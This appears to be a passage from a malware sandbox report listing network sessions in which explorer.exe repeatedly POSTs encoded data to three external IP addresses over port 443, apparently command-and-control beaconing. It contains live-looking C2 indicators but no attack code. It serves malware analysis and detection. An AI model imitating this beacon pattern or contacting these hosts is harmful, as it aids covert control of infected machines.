K3nxSFBDEIzWnQSanat9kRy7gn1mmw76FrtHOs1nMy00Vc3J8Vv0mCrwrUECfGnotNDoDVytmOHdzA7KuFsBPBQMUB8vAEq2uFKkEAHzr/EsZCG9eLA9liOUezdgAGOBr+inNZ9sytIyctJukFjRth34o5TAX/HW+E8d3E6N0vDDeyhqnXBkRnOfAemX+Kk+Oc/0okG3Te3mQdUq4AQqw2aOLjwB/vFaWjUx+ADcX+k9AcCgYGBiXpU9kZW73XU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	51902	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:22 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:22 UTC	1122	OUT	Data Raw: 41 4a 5a 78 41 4c 43 49 30 62 6d 72 6a 70 62 77 76 44 42 61 30 4c 45 43 6c 6a 2b 48 56 4a 34 6f 39 62 48 55 50 4d 6b 69 68 55 31 35 69 39 51 72 44 56 68 58 55 33 67 49 75 6b 54 5a 48 79 71 4d 44 73 2f 59 51 50 79 4a 42 68 77 54 69 47 37 74 6d 33 74 65 43 6d 39 75 6f 68 38 6e 4e 36 50 76 45 70 2f 44 2b 6f 38 52 76 31 77 47 41 4b 52 2f 34 63 62 35 4f 2b 57 35 4c 72 4a 6c 79 35 4c 67 42 74 7a 4a 49 4a 52 61 71 6d 68 70 41 43 6e 50 35 6c 75 6b 79 79 7a 59 76 31 6b 4d 67 70 34 6b 35 42 72 42 35 69 53 63 4c 4a 62 6e 72 30 48 6d 76 6b 72 63 30 64 43 6d 41 39 41 77 37 61 59 53 37 56 66 69 73 4a 62 72 4d 38 73 5a 71 65 6a 2b 7a 62 36 74 41 64 47 61 6e 79 37 51 4c 6f 64 72 68 42 48 61 70 48 77 7a 42 4b 36 71 38 45 74 6d 44 4c 57 45 31 4f 71 67 33 46 45 6d 4d 74 2b Data Ascii: AJZxALCI0bmrjpbwvDBa0LEClj+HVJ4o9bHUPMkihU15i9QrDVhXU3gIukTZHyqMDs/YQPyJBhwTiG7tm3teCm9uoh8nN6PvEp/D+o8Rv1wGAKR/4cb5O+W5LrJly5LgBtzJIJRaqmhpACnP5lukyyzYv1kMgp4k5BrB5iScLJbnr0Hmvkrc0dCmA9Aw7aYS7VfisJbrM8sZqej+zb6tAdGany7QLodrhBHapHwzBK6q8EtmDLWE1Oqg3FEmMt+
2024-07-27 05:32:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:24 UTC	685	IN	Data Raw: 4a 2f 4d 30 67 4f 47 45 74 4f 6d 79 57 6c 2b 4d 38 76 58 2f 44 43 50 62 39 75 59 61 6c 41 7a 4e 69 57 73 6b 71 61 4c 36 45 68 5a 49 39 61 42 6e 70 49 36 2b 7a 70 69 65 34 4f 37 73 6a 4c 48 57 4c 38 44 6d 53 4b 6e 36 68 56 76 54 33 49 75 53 4a 54 43 30 70 30 45 59 36 55 4f 4b 65 53 35 75 57 59 34 57 61 58 35 36 33 67 74 6c 46 6b 41 7a 4c 4a 56 63 67 6c 4b 51 55 6f 75 2f 46 69 54 46 66 6d 4b 43 33 57 46 69 79 6b 57 5a 41 52 44 51 66 44 73 2f 4b 58 5a 47 6f 52 77 76 79 39 6a 65 65 47 6a 6b 4c 74 4f 52 7a 31 4f 6c 6c 43 34 44 63 67 42 30 56 72 51 77 34 53 63 31 6e 73 77 47 72 6c 73 30 54 42 34 33 47 43 6c 73 50 73 59 48 2f 66 50 4b 51 33 4a 2f 39 49 5a 4c 4b 75 2f 4b 75 69 64 64 6b 72 6b 2b 6b 64 58 67 50 36 35 41 49 53 6f 66 4c 52 31 35 75 2b 6b 56 31 36 66 Data Ascii: J/M0gOGEtOmyWl+M8vX/DCPb9uYalAzNiWskqaL6EhZI9aBnpI6+zpie4O7sjLHWL8DmSKn6hVvT3IuSJTC0p0EY6UOKeS5uWY4WaX563gtlFkAzLJVcglKQUou/FiTFfmKC3WFiykWZARDQfDs/KXZGoRwvy9jeeGjkLtORz1OllC4DcgB0VrQw4Sc1nswGrls0TB43GClsPsYH/fPKQ3J/9IZLKu/Kuiddkrk+kdXgP65AISofLR15u+kV16f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	51903	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:24 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:24 UTC	1122	OUT	Data Raw: 63 42 4c 33 36 6f 62 65 7a 57 48 70 58 64 36 4c 45 72 39 64 57 4d 61 78 53 44 51 57 2b 6e 50 57 6e 58 7a 42 6a 66 45 51 4b 66 78 58 52 6a 30 52 52 67 7a 50 63 51 38 46 48 33 4f 48 4a 71 31 42 69 2f 48 52 32 58 73 66 38 4e 30 5a 31 54 48 32 75 4c 51 6c 56 35 68 44 52 63 77 74 76 65 59 4a 73 45 71 69 2b 68 33 6c 36 74 35 59 38 36 36 59 77 75 6b 38 30 35 35 30 4e 69 48 2b 6b 76 4d 47 42 56 64 37 77 71 67 61 38 2b 6e 55 42 30 54 30 59 47 4e 31 38 4f 44 54 76 4d 72 4a 68 57 4d 2b 32 4d 2f 32 6c 67 74 57 34 78 4c 76 71 4f 7a 69 33 59 61 2f 79 62 30 75 2b 42 61 52 59 74 5a 69 65 4c 55 54 4a 49 4b 64 50 70 77 66 53 61 48 56 72 77 65 38 4a 52 67 44 32 57 7a 78 31 6d 54 4a 47 4b 57 71 69 53 6d 38 52 76 4c 49 44 39 38 2f 70 32 78 32 4f 33 74 49 36 7a 67 6c 7a 31 68 Data Ascii: cBL36obezWHpXd6LEr9dWMaxSDQW+nPWnXzBjfEQKfxXRj0RRgzPcQ8FH3OHJq1Bi/HR2Xsf8N0Z1TH2uLQlV5hDRcwtveYJsEqi+h3l6t5Y866Ywuk80550NiH+kvMGBVd7wqga8+nUB0T0YGN18ODTvMrJhWM+2M/2lgtW4xLvqOzi3Ya/yb0u+BaRYtZieLUTJIKdPpwfSaHVrwe8JRgD2Wzx1mTJGKWqiSm8RvLID98/p2x2O3tI6zglz1h
2024-07-27 05:32:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:26 UTC	685	IN	Data Raw: 63 71 6b 74 73 76 2b 73 37 69 46 56 72 56 45 4f 63 75 2b 42 55 64 68 41 66 54 72 70 38 38 75 4c 59 6b 36 4d 72 41 72 57 49 6f 41 33 43 66 37 36 4f 6c 5a 47 2b 31 47 6e 30 64 49 34 63 6b 54 56 42 56 4a 68 46 76 50 5a 78 2b 2b 4b 6d 52 38 30 61 37 4c 79 43 35 65 2b 54 6b 54 42 78 52 6e 76 50 41 6f 2f 31 31 43 79 2f 48 5a 4a 37 6d 61 4f 63 6c 2b 71 6a 42 71 78 51 2b 45 49 42 39 33 7a 52 73 46 31 42 6d 79 6f 35 61 6e 5a 2b 71 51 45 78 45 67 4a 6c 57 51 72 41 2b 47 41 76 45 70 47 4e 64 4e 6c 65 32 36 54 55 69 71 6d 55 37 79 47 50 6c 65 56 48 67 30 51 41 32 6c 72 6d 72 74 38 67 55 72 5a 67 34 73 63 48 7a 59 36 73 6c 2b 55 35 4b 39 4a 50 39 4e 37 72 5a 53 4f 6a 63 58 4f 4b 6a 57 46 5a 37 58 57 71 46 7a 79 36 53 37 39 47 61 67 41 64 53 36 38 6b 37 4e 72 58 4b 47 Data Ascii: cqktsv+s7iFVrVEOcu+BUdhAfTrp88uLYk6MrArWIoA3Cf76OlZG+1Gn0dI4ckTVBVJhFvPZx++KmR80a7LyC5e+TkTBxRnvPAo/11Cy/HZJ7maOcl+qjBqxQ+EIB93zRsF1Bmyo5anZ+qQExEgJlWQrA+GAvEpGNdNle26TUiqmU7yGPleVHg0QA2lrmrt8gUrZg4scHzY6sl+U5K9JP9N7rZSOjcXOKjWFZ7XWqFzy6S79GagAdS68k7NrXKG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	51904	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:27 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:27 UTC	1267	OUT	Data Raw: 71 6f 63 67 6f 74 74 76 56 79 44 6b 45 5a 4f 6b 6d 42 76 4b 51 66 70 4a 7a 63 4e 74 61 68 67 4d 61 5a 72 46 33 56 68 5a 46 74 37 63 45 53 75 63 67 77 43 36 6c 41 6d 34 37 41 68 2f 49 50 44 68 77 52 76 65 66 76 6b 2b 44 65 67 48 68 50 77 5a 51 61 75 43 51 56 4a 53 77 34 6f 76 6e 62 2b 63 67 75 44 64 79 43 55 53 37 4a 61 4b 7a 32 4a 58 37 67 30 65 64 47 72 65 66 34 64 55 75 34 47 74 72 30 66 63 64 51 58 6d 6e 30 56 4c 43 7a 66 32 67 64 71 58 78 31 59 6c 63 42 51 42 54 4c 76 58 33 4c 34 32 4e 78 64 64 6d 53 73 33 54 69 57 45 77 56 6a 67 64 74 51 63 32 71 4e 6d 6d 2b 32 43 71 62 44 52 62 6b 65 69 35 61 57 79 75 38 6b 48 37 67 53 2b 77 64 73 72 69 6a 79 4b 49 47 74 74 4a 6d 35 64 65 4a 70 55 71 62 72 58 6c 52 35 74 51 36 39 73 51 69 30 70 70 31 34 32 7a 6b 62 Data Ascii: qocgottvVyDkEZOkmBvKQfpJzcNtahgMaZrF3VhZFt7cESucgwC6lAm47Ah/IPDhwRvefvk+DegHhPwZQauCQVJSw4ovnb+cguDdyCUS7JaKz2JX7g0edGref4dUu4Gtr0fcdQXmn0VLCzf2gdqXx1YlcBQBTLvX3L42NxddmSs3TiWEwVjgdtQc2qNmm+2CqbDRbkei5aWyu8kH7gS+wdsrijyKIGttJm5deJpUqbrXlR5tQ69sQi0pp142zkb
2024-07-27 05:32:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:28 UTC	685	IN	Data Raw: 56 7a 61 44 6f 30 6e 74 56 69 36 55 71 38 55 38 2f 57 70 78 5a 2b 63 33 73 6b 4a 41 70 78 32 52 6d 79 53 47 75 79 31 64 48 42 54 50 5a 41 34 45 5a 50 4e 79 2f 4c 30 63 68 37 41 34 67 71 67 6d 51 53 6e 2b 4f 52 71 4d 77 55 34 31 44 70 67 45 52 56 39 54 74 31 62 47 54 44 6b 44 44 5a 43 2b 2f 66 70 73 42 34 70 78 70 4c 58 64 30 58 71 47 69 48 4a 78 6b 6e 56 6d 33 6c 56 57 67 66 45 2b 54 62 66 67 36 7a 67 55 61 6e 38 31 48 39 46 35 6c 66 49 4c 67 59 73 72 4d 72 70 57 7a 74 39 32 34 78 79 4b 49 38 78 35 52 41 48 30 46 39 38 67 6e 7a 61 77 36 59 6d 62 56 62 53 57 57 65 57 75 55 4e 55 4f 66 52 56 6e 6f 6f 66 61 73 76 73 42 7a 46 59 36 51 76 41 58 4c 45 35 79 58 43 46 76 38 61 67 62 6f 78 2f 4b 73 33 2b 4c 7a 70 71 42 42 38 51 79 58 41 51 56 73 51 72 32 5a 35 38 Data Ascii: VzaDo0ntVi6Uq8U8/WpxZ+c3skJApx2RmySGuy1dHBTPZA4EZPNy/L0ch7A4gqgmQSn+ORqMwU41DpgERV9Tt1bGTDkDDZC+/fpsB4pxpLXd0XqGiHJxknVm3lVWgfE+Tbfg6zgUan81H9F5lfILgYsrMrpWzt924xyKI8x5RAH0F98gnzaw6YmbVbSWWeWuUNUOfRVnoofasvsBzFY6QvAXLE5yXCFv8agbox/Ks3+LzpqBB8QyXAQVsQr2Z58

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	51905	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:28 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:28 UTC	1122	OUT	Data Raw: 47 73 4e 33 4d 5a 6b 71 41 49 68 70 45 6c 4a 66 6c 39 33 38 71 57 4a 75 7a 46 36 33 50 73 48 6e 44 57 63 65 31 48 76 52 44 64 48 7a 33 36 5a 51 31 6f 51 2f 63 75 43 53 33 48 76 66 4d 66 48 48 64 52 51 77 32 2b 54 53 5a 79 78 6e 46 42 52 66 6a 68 71 46 6f 65 58 62 59 4a 49 73 73 55 6d 78 6e 4b 6d 58 75 4b 79 63 79 77 4b 2f 4d 66 74 6a 59 63 50 58 6e 6a 54 69 6e 73 55 34 46 47 70 61 6f 4a 70 66 48 30 68 58 61 4b 46 5a 73 49 33 6d 54 6e 78 6d 4e 59 50 6d 2f 53 71 47 56 32 4f 48 42 51 44 72 6e 44 57 66 4d 41 4a 77 56 6d 61 4c 47 67 4f 62 53 4d 76 34 5a 63 43 56 66 50 6f 73 68 31 6b 45 42 2b 54 41 33 71 42 49 6a 34 34 6b 66 79 39 77 67 4d 77 73 67 58 41 72 36 58 79 75 4e 4a 79 71 30 65 52 37 44 41 53 6a 5a 33 61 77 42 73 4f 5a 79 41 6f 64 42 4d 4a 79 43 49 35 Data Ascii: GsN3MZkqAIhpElJfl938qWJuzF63PsHnDWce1HvRDdHz36ZQ1oQ/cuCS3HvfMfHHdRQw2+TSZyxnFBRfjhqFoeXbYJIssUmxnKmXuKycywK/MftjYcPXnjTinsU4FGpaoJpfH0hXaKFZsI3mTnxmNYPm/SqGV2OHBQDrnDWfMAJwVmaLGgObSMv4ZcCVfPosh1kEB+TA3qBIj44kfy9wgMwsgXAr6XyuNJyq0eR7DASjZ3awBsOZyAodBMJyCI5
2024-07-27 05:32:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:30 UTC	685	IN	Data Raw: 62 6f 62 50 36 68 56 50 50 30 66 44 71 6e 49 62 49 78 71 43 6f 56 48 6a 51 6b 53 35 71 38 48 6b 74 7a 38 37 2f 34 71 4f 42 70 4d 6a 73 55 79 4e 63 46 45 65 68 61 79 37 33 61 46 36 59 59 52 75 5a 39 44 7a 6f 51 48 43 76 44 73 61 6d 50 30 4f 50 46 6d 63 38 50 51 39 7a 69 43 77 4f 4b 4a 79 34 64 6d 37 43 72 32 32 66 2b 33 63 62 61 2f 5a 41 70 70 45 7a 6a 2b 4d 44 6a 34 74 32 64 6d 6e 35 45 55 48 39 4e 69 33 57 4a 30 66 43 35 74 31 67 59 35 71 6e 41 79 6d 66 6a 79 69 4d 4b 62 41 6f 2f 33 34 7a 35 70 75 38 54 62 2f 77 75 55 6c 6a 53 4d 49 53 46 72 6a 66 31 49 52 39 4c 51 43 7a 6c 36 48 2f 67 30 58 61 76 37 46 5a 30 6e 79 71 55 37 71 78 56 54 48 53 4d 4c 4c 34 4e 33 31 43 6d 4c 51 44 6f 43 71 6f 6f 47 59 58 43 49 63 37 72 4e 56 76 4a 37 32 39 6e 55 31 5a 70 32 Data Ascii: bobP6hVPP0fDqnIbIxqCoVHjQkS5q8Hktz87/4qOBpMjsUyNcFEehay73aF6YYRuZ9DzoQHCvDsamP0OPFmc8PQ9ziCwOKJy4dm7Cr22f+3cba/ZAppEzj+MDj4t2dmn5EUH9Ni3WJ0fC5t1gY5qnAymfjyiMKbAo/34z5pu8Tb/wuUljSMISFrjf1IR9LQCzl6H/g0Xav7FZ0nyqU7qxVTHSMLL4N31CmLQDoCqooGYXCIc7rNVvJ729nU1Zp2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	51906	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:30 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:30 UTC	1267	OUT	Data Raw: 6a 6e 63 6b 2b 63 31 46 31 74 57 4c 4d 42 7a 4e 75 61 70 53 31 45 52 6e 4e 45 43 41 61 52 57 6a 42 36 57 57 2f 37 44 52 49 6d 4a 32 45 74 38 33 6a 64 57 62 52 4b 4b 41 67 62 4d 39 33 63 66 65 30 74 63 54 48 41 54 57 53 5a 35 78 64 36 54 56 66 61 64 2f 59 52 57 62 73 6a 39 59 5a 2f 6a 38 67 35 4f 55 43 33 6a 6a 69 54 46 30 75 6b 2f 4f 6e 58 71 67 47 44 53 45 33 56 75 64 49 76 52 73 74 4d 2b 66 49 58 77 56 4a 59 6e 4d 2b 65 34 74 37 44 32 35 57 6f 32 74 59 6f 35 43 30 67 68 75 46 6d 4c 62 44 31 74 57 35 76 67 6c 4e 43 39 2b 58 6c 43 51 6c 71 49 30 33 74 76 57 67 5a 64 42 37 45 55 32 39 57 2f 66 50 6c 33 67 72 65 38 65 6c 4f 6e 6d 58 31 66 6b 77 50 33 31 55 44 4f 56 51 48 68 5a 74 6a 58 75 4a 74 45 66 31 6f 74 38 64 38 4b 54 66 62 55 31 58 79 61 6e 65 44 36 Data Ascii: jnck+c1F1tWLMBzNuapS1ERnNECAaRWjB6WW/7DRImJ2Et83jdWbRKKAgbM93cfe0tcTHATWSZ5xd6TVfad/YRWbsj9YZ/j8g5OUC3jjiTF0uk/OnXqgGDSE3VudIvRstM+fIXwVJYnM+e4t7D25Wo2tYo5C0ghuFmLbD1tW5vglNC9+XlCQlqI03tvWgZdB7EU29W/fPl3gre8elOnmX1fkwP31UDOVQHhZtjXuJtEf1ot8d8KTfbU1XyaneD6
2024-07-27 05:32:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:32 UTC	685	IN	Data Raw: 6a 75 46 47 39 46 64 56 35 38 64 49 34 4b 78 71 52 36 73 6b 74 69 43 61 6f 31 68 6c 4a 4b 49 5a 69 51 39 79 51 6d 44 62 33 67 6a 6b 36 67 74 34 37 4c 68 6b 4f 68 55 6e 4e 6e 6d 44 4b 46 76 56 45 2f 2f 4a 54 49 77 45 67 4a 41 63 36 70 55 6d 33 34 66 71 6e 47 74 42 55 56 78 50 32 4a 42 79 44 45 56 32 67 43 31 6f 2f 30 68 2f 71 46 57 4d 77 49 73 56 6c 4d 37 57 4b 50 2f 6b 35 6b 71 58 66 42 6c 5a 73 76 53 33 45 34 6a 58 50 34 43 32 63 53 54 5a 34 2b 6e 69 4c 70 74 76 6b 41 59 4d 64 44 35 66 75 55 4a 67 68 4b 57 67 2f 71 64 4c 37 61 61 4c 59 48 57 6b 46 7a 78 69 2f 42 46 68 66 44 56 70 33 6f 53 41 6e 47 42 61 65 65 78 4e 74 5a 58 35 72 54 55 56 6a 51 56 4a 69 77 57 44 54 44 51 79 30 7a 48 4b 63 6c 4c 45 67 6a 6a 6b 65 38 59 58 59 58 54 48 62 6d 31 62 2b 6d 4c Data Ascii: juFG9FdV58dI4KxqR6sktiCao1hlJKIZiQ9yQmDb3gjk6gt47LhkOhUnNnmDKFvVE//JTIwEgJAc6pUm34fqnGtBUVxP2JByDEV2gC1o/0h/qFWMwIsVlM7WKP/k5kqXfBlZsvS3E4jXP4C2cSTZ4+niLptvkAYMdD5fuUJghKWg/qdL7aaLYHWkFzxi/BFhfDVp3oSAnGBaeexNtZX5rTUVjQVJiwWDTDQy0zHKclLEgjjke8YXYXTHbm1b+mL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	51907	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:32 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:32 UTC	1122	OUT	Data Raw: 59 46 35 73 75 77 7a 72 59 78 74 6c 4d 31 44 6e 75 32 76 73 67 61 6b 47 74 65 2b 31 74 42 70 59 39 32 5a 76 66 4e 36 55 69 33 54 4a 63 55 43 6b 34 51 4c 68 46 68 47 35 4f 42 33 57 6a 62 74 71 33 76 71 54 47 73 33 70 4a 34 36 44 72 54 7a 37 6a 6b 4b 31 5a 56 71 45 77 61 36 65 48 6d 35 76 71 36 37 70 41 68 62 55 6b 4f 6e 38 67 78 4f 65 59 4e 67 4f 34 30 31 71 6b 34 37 66 4e 36 48 38 4d 6a 32 2f 35 6a 49 58 46 73 69 41 45 38 34 6b 33 4c 4a 66 4d 7a 41 4b 35 78 66 5a 61 44 50 49 69 39 67 78 66 63 73 68 35 6c 31 75 70 51 38 32 68 4d 72 6c 57 46 48 52 4c 32 64 39 78 55 6a 47 78 64 68 68 65 55 58 43 6b 30 50 36 4d 6b 33 46 4e 42 79 6c 46 47 44 70 4c 45 4f 6a 4d 41 4b 57 48 63 58 31 32 34 65 2f 31 49 4d 33 47 56 2b 35 4a 65 4f 41 70 5a 30 43 63 2b 56 2f 4c 6d 44 Data Ascii: YF5suwzrYxtlM1Dnu2vsgakGte+1tBpY92ZvfN6Ui3TJcUCk4QLhFhG5OB3Wjbtq3vqTGs3pJ46DrTz7jkK1ZVqEwa6eHm5vq67pAhbUkOn8gxOeYNgO401qk47fN6H8Mj2/5jIXFsiAE84k3LJfMzAK5xfZaDPIi9gxfcsh5l1upQ82hMrlWFHRL2d9xUjGxdhheUXCk0P6Mk3FNBylFGDpLEOjMAKWHcX124e/1IM3GV+5JeOApZ0Cc+V/LmD
2024-07-27 05:32:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:33 UTC	685	IN	Data Raw: 4e 39 4d 78 58 6d 74 35 31 4f 79 69 4a 51 49 35 6f 31 46 61 57 4a 33 69 69 32 6a 72 67 68 4d 4d 77 39 4a 76 53 2f 51 61 59 4e 61 67 5a 2f 33 34 36 44 65 55 39 6b 6a 41 6e 69 48 49 36 59 33 36 79 36 65 4e 77 56 6f 66 6d 76 54 47 47 57 6a 4e 4f 75 78 42 6b 59 76 6e 51 69 59 43 56 39 62 36 5a 70 36 6c 59 48 74 4d 56 6d 56 43 43 76 31 4b 57 62 2b 46 72 76 6f 49 67 35 51 2f 34 46 4a 54 6f 5a 53 36 2f 4f 78 4e 79 37 39 69 4d 74 5a 64 4d 36 76 65 35 33 4a 48 70 44 62 35 56 4c 75 4b 67 77 4c 73 70 48 50 78 47 50 56 45 6b 47 53 2b 6e 63 72 55 39 42 48 6b 71 35 4c 4e 33 77 2f 78 53 56 31 50 64 46 7a 39 6b 35 76 63 42 50 50 38 44 31 43 36 59 31 4b 42 31 37 41 4d 38 4a 73 58 42 43 4e 74 45 52 47 63 66 47 41 52 77 6c 6a 55 44 38 69 78 51 2b 6c 38 34 6e 78 67 30 71 43 Data Ascii: N9MxXmt51OyiJQI5o1FaWJ3ii2jrghMMw9JvS/QaYNagZ/346DeU9kjAniHI6Y36y6eNwVofmvTGGWjNOuxBkYvnQiYCV9b6Zp6lYHtMVmVCCv1KWb+FrvoIg5Q/4FJToZS6/OxNy79iMtZdM6ve53JHpDb5VLuKgwLspHPxGPVEkGS+ncrU9BHkq5LN3w/xSV1PdFz9k5vcBPP8D1C6Y1KB17AM8JsXBCNtERGcfGARwljUD8ixQ+l84nxg0qC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	51909	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:34 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:34 UTC	1122	OUT	Data Raw: 6e 6b 65 4d 54 68 4f 2f 79 43 48 58 6b 4d 4b 6b 44 38 74 78 69 6f 6f 77 57 43 7a 66 49 56 55 72 4d 30 75 48 2f 69 69 45 72 36 65 55 66 44 35 75 2f 6a 4f 49 61 55 53 7a 6d 68 6c 2f 34 34 51 33 2b 63 38 79 73 2b 61 53 45 54 30 4d 4c 48 43 52 44 58 58 4d 6e 72 6b 6d 6f 74 30 74 6b 61 39 73 2b 33 4a 35 65 50 2b 35 7a 6e 4c 59 61 58 77 42 42 30 44 77 4c 47 4f 52 63 66 54 71 64 41 2f 4f 62 62 32 63 43 6f 35 5a 4c 4e 43 58 31 33 69 2b 78 55 78 73 79 64 56 39 53 37 59 34 52 35 70 4d 2f 50 6f 74 42 53 41 52 71 4b 32 4f 37 6b 77 67 4b 74 76 51 6d 64 45 78 45 6a 33 59 4e 59 49 54 6c 70 4a 62 6f 2f 4c 58 76 57 32 39 6e 34 75 4a 38 65 48 42 37 44 43 63 38 52 6c 54 7a 71 58 69 61 79 4a 4a 32 55 44 78 30 50 4b 65 38 64 72 4e 4b 47 47 44 45 35 55 37 59 53 6d 67 55 77 53 Data Ascii: nkeMThO/yCHXkMKkD8txioowWCzfIVUrM0uH/iiEr6eUfD5u/jOIaUSzmhl/44Q3+c8ys+aSET0MLHCRDXXMnrkmot0tka9s+3J5eP+5znLYaXwBB0DwLGORcfTqdA/Obb2cCo5ZLNCX13i+xUxsydV9S7Y4R5pM/PotBSARqK2O7kwgKtvQmdExEj3YNYITlpJbo/LXvW29n4uJ8eHB7DCc8RlTzqXiayJJ2UDx0PKe8drNKGGDE5U7YSmgUwS
2024-07-27 05:32:35 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:35 UTC	685	IN	Data Raw: 57 61 71 39 37 4c 4e 4f 68 58 35 46 35 34 45 32 77 6f 4f 2f 4a 4e 46 6f 76 56 2f 37 4a 44 41 57 77 34 69 35 70 43 64 63 34 2f 53 42 62 73 64 32 53 57 76 4b 70 33 43 2b 55 52 7a 36 7a 52 41 49 6c 47 4f 4d 73 58 58 4e 46 6d 74 32 74 34 68 51 44 68 42 6c 6b 72 6a 79 4a 6d 73 6a 50 69 79 4c 4d 30 6b 2b 63 52 6d 49 4c 41 64 65 54 48 31 34 45 4b 73 68 58 51 4a 6f 65 7a 56 6f 48 68 31 48 50 77 36 59 55 55 6f 31 55 69 73 51 56 58 47 52 33 62 6b 4b 4d 56 79 64 54 6e 58 72 57 41 41 46 54 42 66 2b 62 72 49 30 64 67 76 32 4f 33 64 52 6f 55 34 5a 2b 61 66 61 5a 36 4d 2f 73 48 59 48 4a 53 55 63 77 6d 6c 45 6d 79 68 6f 63 79 53 34 73 71 43 52 44 50 44 4d 55 32 62 69 2b 57 36 64 50 4e 67 4e 6a 44 63 59 64 6f 32 4a 30 4b 70 42 31 41 72 6a 42 6a 6a 66 66 4e 78 70 32 75 55 Data Ascii: Waq97LNOhX5F54E2woO/JNFovV/7JDAWw4i5pCdc4/SBbsd2SWvKp3C+URz6zRAIlGOMsXXNFmt2t4hQDhBlkrjyJmsjPiyLM0k+cRmILAdeTH14EKshXQJoezVoHh1HPw6YUUo1UisQVXGR3bkKMVydTnXrWAAFTBf+brI0dgv2O3dRoU4Z+afaZ6M/sHYHJSUcwmlEmyhocyS4sqCRDPDMU2bi+W6dPNgNjDcYdo2J0KpB1ArjBjjffNxp2uU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	51910	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
